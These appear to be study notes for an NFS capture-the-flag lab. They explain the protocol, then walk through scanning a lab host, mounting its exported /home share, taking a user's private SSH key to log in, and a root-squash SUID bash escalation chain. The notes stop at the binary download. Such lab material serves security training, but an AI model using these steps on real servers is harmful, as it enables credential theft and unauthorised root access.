NFS
Understanding NFS
What is NFS?
NFS stands for "Network File System" and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.
How does NFS work?
Computer network - Vector stencils library | Computers ...
We don't need to understand the technical exchange in too much detail to be able to exploit NFS effectively- however if this is something that interests you, I would recommend this resource: https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html
First, the client will request to mount a directory from a remote host on a local directory just the same way it can mount a physical device. The mount service will then act to connect to the relevant mount daemon using RPC.
The server checks if the user has permission to mount whatever directory has been requested. It will then return a file handle which uniquely identifies each file and directory that is on the server.
If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:
The file handle
The name of the file to be accessed
The user's, user ID
The user's group ID
These are used in determining access rights to the specified file. This is what controls user permissions, I.E read and write of files.
What runs NFS?
Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or UNIX.
A computer running Windows Server can act as an NFS file server for other non-Windows client computers. Likewise, NFS allows a Windows-based computer running Windows Server to access files stored on a non-Windows NFS server.
More Information:
Here are some resources that explain the technical implementation, and working of, NFS in more detail than I have covered here.
https://www.datto.com/library/what-is-nfs-file-share
https://wiki.archlinux.org/index.php/NFS
Enumerating NFS
$ nmap -A -p-
Discovered open port 111/tcp on 10.10.212.47
Discovered open port 22/tcp on 10.10.212.47
Discovered open port 40979/tcp on 10.10.212.47
Discovered open port 2049/tcp on 10.10.212.47
Discovered open port 56897/tcp on 10.10.212.47
Discovered open port 38159/tcp on 10.10.212.47
Discovered open port 44707/tcp on 10.10.212.47
$ rustscan -i
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ { { _}{ {__ / } / {} | | |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |-' -'-----'----'-' ----'---' -'-'-'-'
The Modern Day Port Scanner.
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.76.50:22
Open 10.10.76.50:111
Open 10.10.76.50:2049
Open 10.10.76.50:37889
Open 10.10.76.50:38113
Open 10.10.76.50:39607
Open 10.10.76.50:45317
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-26 10:47 EST
Initiating Ping Scan at 10:47
Scanning 10.10.76.50 [2 ports]
Completed Ping Scan at 10:47, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:47
Completed Parallel DNS resolution of 1 host. at 10:47, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:47
Scanning 10.10.76.50 [7 ports]
Discovered open port 111/tcp on 10.10.76.50
Discovered open port 22/tcp on 10.10.76.50
Discovered open port 2049/tcp on 10.10.76.50
Discovered open port 39607/tcp on 10.10.76.50
Discovered open port 37889/tcp on 10.10.76.50
Discovered open port 38113/tcp on 10.10.76.50
Discovered open port 45317/tcp on 10.10.76.50
Completed Connect Scan at 10:47, 0.10s elapsed (7 total ports)
Nmap scan report for 10.10.76.50
Host is up, received conn-refused (0.100s latency).
Scanned at 2021-11-26 10:47:36 EST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
111/tcp open rpcbind syn-ack
2049/tcp open nfs syn-ack
37889/tcp open unknown syn-ack
38113/tcp open unknown syn-ack
39607/tcp open unknown syn-ack
45317/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
command to list NFS shares - /home is the visible share
$ /usr/sbin/showmount -e 10.10.76.50
Export list for 10.10.76.50:
/home *
use mount command to mount NFS share to local machine
$ sudo mount -t nfs 10.10.76.50:home /tmp/mount/ -nolock
change directory to where you mounted the share. what is the name of the folder?
cappucino
ls folders inside
open .ssh
id_rsa - key that can be used with ssh to acces IP without password
copy id_rsa to a different folder
$ cp id_rsa /tmp/
Chmod 600 (chmod a+rwx,u-x,g-rwx,o-rwx) sets permissions so that, (U)ser / owner can read, can write and can't execute. (G)roup can't read, can't write and can't execute. (O)thers can't read, can't write and can't execute.
$ chmod 600 id_rsa
ssh into IP
$ ssh -i id_rsa cappucino@10.10.76.50
Exploiting NFS
NFS Access ->
Gain Low Privilege Shell ->
Upload Bash Executable to the NFS share ->
Set SUID Permissions Through NFS Due To Misconfigured Root Squash ->
Login through SSH ->
Execute SUID Bit Bash Executable ->
ROOT ACCESS
The Executable
Due to compatibility reasons, we'll use a standard Ubuntu Server 18.04 bash executable, the same as the server's- as we know from our nmap scan. You can download it here- https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash